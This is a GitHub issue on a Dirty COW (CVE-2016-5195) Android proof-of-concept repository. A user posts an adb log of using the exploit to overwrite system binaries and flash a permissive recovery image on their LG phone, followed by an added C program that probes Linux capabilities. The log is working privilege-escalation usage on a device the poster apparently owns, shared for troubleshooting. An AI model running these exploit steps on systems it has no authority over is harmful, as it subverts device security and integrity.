timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android

LGH91810j - WETA Rom, lost root + twrp. runas operation not permitted #52

Open darkseid4nk opened 7 years ago

darkseid4nk commented 7 years ago

Stuck in an unrooted non-stock ROM. OEM unlocked. USB debugging on. getenforce: permissive. Full log. Everything works up till run-as. Offering $50 to whoever can help fix this. Full log of the adb commands:

```
C:\Users\darkseid\Desktop\LG_stuff>adb push dirtycow /data/local/tmp
dirtycow: 1 file pushed. 0.2 MB/s (9984 bytes in 0.042s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-applypatch /data/local/tmp
recowvery-applypatch: 1 file pushed. 1.7 MB/s (18472 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-app_process64 /data/local/tmp
recowvery-app_process64: 1 file pushed. 1.0 MB/s (10200 bytes in 0.009s)

C:\Users\darkseid\Desktop\LG_stuff>adb push recowvery-run-as /data/local/tmp
recowvery-run-as: 1 file pushed. 0.9 MB/s (10192 bytes in 0.011s)

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ls
dirtycow recowvery-app_process64 recowvery-applypatch recowvery-run-as
elsa:/data/local/tmp $ chmod 0777 *
elsa:/data/local/tmp $ ./dirtycow /system/bin/applypatch recowvery-applypatch
warning: new file size (18472) and file old size (165144) differ

size 165144

[*] mmap 0x79eac35000
[*] exploit (patch)
[*] currently 0x79eac35000=10102464c457f
[*] madvise = 0x79eac35000 165144
[*] madvise = 0 1048576
[*] /proc/self/mem 1367343104 1048576
[*] exploited 0x79eac35000=10102464c457f
elsa:/data/local/tmp $ ./dirtycow /system/bin/app_process64 recowvery-app_process64
warning: new file size (10200) and file old size (18600) differ

size 18600

[*] mmap 0x7280bda000
[*] exploit (patch)
[*] currently 0x7280bda000=10102464c457f
[*] madvise = 0x7280bda000 18600
[*] madvise = 0 1048576
[*] /proc/self/mem -1971322880 1048576
[*] exploited 0x7280bda000=10102464c457f
elsa:/data/local/tmp $ exit

C:\Users\darkseid\Desktop\LG_stuff>adb logcat -s recowvery
--------- beginning of system
--------- beginning of main
--------- beginning of crash
01-21 19:34:18.696  7457  7457 I recowvery: Welcome to recowvery! (app_process64)
01-21 19:34:18.696  7457  7457 I recowvery: ------------
01-21 19:34:18.697  7457  7457 I recowvery: Current selinux context: u:r:zygote:s0
01-21 19:34:18.697  7457  7457 I recowvery: Set context to 'u:r:system_server:s0'
01-21 19:34:18.698  7457  7457 I recowvery: Current security context: u:r:system_server:s0
01-21 19:34:18.698  7457  7457 I recowvery: Setting property 'ctl.start' to 'flash_recovery'
01-21 19:34:18.708  7457  7457 I recowvery: ------------
01-21 19:34:18.708  7457  7457 I recowvery: Recovery flash script should have started!
01-21 19:34:18.708  7457  7457 I recowvery: Run on your PC or device to see progress: adb logcat -s recowvery
01-21 19:34:18.708  7457  7457 I recowvery: Waiting 120 seconds...
01-21 19:34:18.756  7461  7461 I recowvery: Welcome to recowvery! (applypatch)
01-21 19:34:18.757  7461  7461 I recowvery: ------------
01-21 19:34:18.757  7461  7461 I recowvery: Loading boot image from block device '/dev/block/bootdevice/by-name/boot'...
01-21 19:34:18.871  7461  7461 I recowvery: Loaded boot image!
01-21 19:34:18.871  7461  7461 I recowvery: ------------
01-21 19:34:18.871  7461  7461 I recowvery: Saving old ramdisk to file
01-21 19:34:18.892  7461  7461 I recowvery: Writing to file '/cache/ramdisk.gz'...
01-21 19:34:18.930  7461  7461 I recowvery: Wrote OK: 7100944 bytes
01-21 19:34:18.930  7461  7461 I recowvery: Decompressing ramdisk (gzip -d)
01-21 19:34:19.357  7461  7461 I recowvery: Checking '/cache/ramdisk.cpio' for validity (size >= 4194304 bytes)
01-21 19:34:19.357  7461  7461 I recowvery: '/cache/ramdisk.cpio': 18494316 bytes
01-21 19:34:19.357  7461  7461 I recowvery: File OK
01-21 19:34:19.357  7461  7461 I recowvery: Decompression of ramdisk successful
01-21 19:34:19.357  7461  7461 I recowvery: Deleting '/cache/ramdisk.gz' (no longer needed)
01-21 19:34:19.363  7461  7461 I recowvery: ------------
01-21 19:34:19.363  7461  7461 I recowvery: Opened cpio archive '/cache/ramdisk.cpio' (18494316 bytes)
01-21 19:34:19.363  7461  7461 I recowvery: Wrote new file (308 bytes) to cpio archive,
01-21 19:34:19.363  7461  7461 I recowvery: Final size: 18494624 bytes
01-21 19:34:19.363  7461  7461 I recowvery: ------------
01-21 19:34:19.363  7461  7461 I recowvery: Compressing cpio to ramdisk (gzip -9 -c)
01-21 19:34:25.911  7461  7461 I recowvery: Checking '/cache/ramdisk.gz' for validity (size >= 2097152 bytes)
01-21 19:34:25.912  7461  7461 I recowvery: '/cache/ramdisk.gz': 7079535 bytes
01-21 19:34:25.912  7461  7461 I recowvery: File OK
01-21 19:34:25.912  7461  7461 I recowvery: Compression of ramdisk successful
01-21 19:34:25.912  7461  7461 I recowvery: Deleting '/cache/ramdisk.cpio' (no longer needed)
01-21 19:34:25.930  7461  7461 I recowvery: Loading new ramdisk into boot image
01-21 19:34:25.942  7461  7461 I recowvery: ------------
01-21 19:34:25.942  7461  7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942  7461  7461 I recowvery: Setting permissive arguments on cmdline
01-21 19:34:25.942  7461  7461 I recowvery: cmdline: "console=ttyHSL0,115200,n8 androidboot.console=ttyHSL0 user_debug=31 ehci-hcd.park=3 lpm_levels.sleep_disabled=1 cma=32M@0-0xffffffff androidboot.hardware=elsa androidboot.selinux=permissive enforcing=0"
01-21 19:34:25.942  7461  7461 I recowvery: ------------
01-21 19:34:25.942  7461  7461 I recowvery: Updating boot image hash
01-21 19:34:26.363  7461  7461 I recowvery: Writing modified boot image to block device '/dev/block/bootdevice/by-name/recovery'...
01-21 19:34:26.581  7461  7461 I recowvery: Done!
01-21 19:34:26.581  7461  7461 I recowvery: ------------
01-21 19:34:26.581  7461  7461 I recowvery: Permissive boot has been has been flashed to /dev/block/bootdevice/by-name/recovery successfully!
01-21 19:34:26.581  7461  7461 I recowvery: You may use 'reboot recovery' now to enter a permissive system.
01-21 19:34:26.581  7461  7461 I recowvery:
01-21 19:34:26.581  7461  7461 I recowvery: give jcadduono a hug, will ya?
01-21 19:34:26.581  7461  7461 I recowvery:
^C
C:\Users\darkseid\Desktop\LG_stuff>adb shell reboot recovery

C:\Users\darkseid\Desktop\LG_stuff>adb shell
elsa:/ $ getenforce
Permissive
elsa:/ $ cd /data/local/tmp
elsa:/data/local/tmp $ ./dirtycow /system/bin/run-as recowvery-run-as
warning: new file size (10192) and file old size (14360) differ

size 14360

[*] mmap 0x7864c47000
[*] exploit (patch)
[*] currently 0x7864c47000=10102464c457f
[*] madvise = 0x7864c47000 14360
[*] madvise = 0 1048576
[*] /proc/self/mem -2122317824 1048576
[*] exploited 0x7864c47000=10102464c457f
elsa:/data/local/tmp $ run-as exec ./recowvery-applypatch boot
Welcome to recowvery! (run-as)

Current uid: 2000
Setting capabilities
Could not set capabilities
Error 1: Operation not permitted
```
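The final `Error 1: Operation not permitted` is the errno that capset(2) returns when a process asks for a capability the kernel never placed in its permitted set: capset may shrink the permitted set but cannot grow it, so CAP_SETUID/CAP_SETGID have to arrive at execve, either because the binary is setuid root or because it carries file capabilities. The diagnostic below is an added example written for this page; it is not part of timwr/CVE-2016-5195 or of jcadduono's recowvery, and its helper names (`read_caps`, `try_raise_caps`, `bounding_has`) are mine. It reads the process's own effective, permitted and bounding sets and then attempts the same kind of capset(2) a run-as replacement makes, printing the errno instead of exiting, so the same log line can be traced to a concrete missing set.

```c
/* capprobe.c: added diagnostic, not part of timwr/CVE-2016-5195 or recowvery.
 * Reads this process's capability sets and tries the capset(2) that a run-as
 * style helper makes, reporting errno instead of aborting. Linux only; for
 * the device, cross-compile with the NDK (aarch64) and push to /data/local/tmp. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <linux/capability.h>

extern long syscall(long number, ...);  /* same prototype as glibc's; harmless if already declared */

/* Linux stores each capability set as two 32-bit words: d[0] holds caps 0..31,
 * d[1] holds caps 32..63. fold() turns them into one 64-bit mask. */
static uint64_t fold(uint32_t lo, uint32_t hi) { return ((uint64_t)hi << 32) | lo; }

/* capget(2) on ourselves (pid 0). Returns 0, or errno on failure. */
static int read_caps(uint64_t *eff, uint64_t *perm, uint64_t *inh)
{
    struct __user_cap_header_struct hdr = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2];
    memset(d, 0, sizeof d);
    if (syscall(SYS_capget, &hdr, d) != 0)
        return errno;
    *eff  = fold(d[0].effective,   d[1].effective);
    *perm = fold(d[0].permitted,   d[1].permitted);
    *inh  = fold(d[0].inheritable, d[1].inheritable);
    return 0;
}

static int has_cap(uint64_t set, int cap) { return (int)((set >> cap) & 1); }

/* Bounding set: 1 = present, 0 = absent, negative errno on error. */
static int bounding_has(int cap)
{
    int r = prctl(PR_CAPBSET_READ, cap, 0, 0, 0);
    return r < 0 ? -errno : r;
}

/* Ask the kernel to add `want` to our permitted and effective sets while
 * keeping everything already held. capset(2) refuses with EPERM when the new
 * permitted set is not a subset of the current one, i.e. when the caps were
 * never granted at execve. Returns 0 on success or errno. */
static int try_raise_caps(uint64_t want)
{
    uint64_t eff, perm, inh;
    int rc = read_caps(&eff, &perm, &inh);
    if (rc)
        return rc;
    uint64_t nperm = perm | want, neff = eff | want;   /* neff stays a subset of nperm */
    struct __user_cap_header_struct hdr = { _LINUX_CAPABILITY_VERSION_3, 0 };
    struct __user_cap_data_struct d[2];
    d[0].permitted   = (uint32_t)nperm; d[1].permitted   = (uint32_t)(nperm >> 32);
    d[0].effective   = (uint32_t)neff;  d[1].effective   = (uint32_t)(neff >> 32);
    d[0].inheritable = (uint32_t)inh;   d[1].inheritable = (uint32_t)(inh >> 32);
    if (syscall(SYS_capset, &hdr, d) != 0)
        return errno;
    return 0;
}

static void report(const char *name, int cap, uint64_t eff, uint64_t perm)
{
    printf("%-10s effective=%d permitted=%d bounding=%d\n", name,
           has_cap(eff, cap), has_cap(perm, cap), bounding_has(cap));
}

int main(void)
{
    uint64_t eff, perm, inh;
    const uint64_t want = (1ULL << CAP_SETUID) | (1ULL << CAP_SETGID);

    printf("Current uid: %d (euid %d)\n", (int)getuid(), (int)geteuid());
    int rc = read_caps(&eff, &perm, &inh);
    if (rc) {
        printf("capget failed: %s\n", strerror(rc));
        return 1;
    }
    report("CAP_SETUID", CAP_SETUID, eff, perm);
    report("CAP_SETGID", CAP_SETGID, eff, perm);

    rc = try_raise_caps(want);
    if (rc == 0)
        printf("capset OK: CAP_SETUID/CAP_SETGID are effective\n");
    else
        printf("capset failed: Error %d: %s\n", rc, strerror(rc));
    return rc ? 1 : 0;
}
```

Run directly from the adb shell (uid 2000, no setuid bit, no file capabilities on the probe itself) it should print `permitted=0` for both capabilities and the same `Error 1: Operation not permitted`; that is the expected baseline. The interesting comparison is the output when the same code runs with the privileges a real run-as gets at execve, which is what the replaced `/system/bin/run-as` depends on.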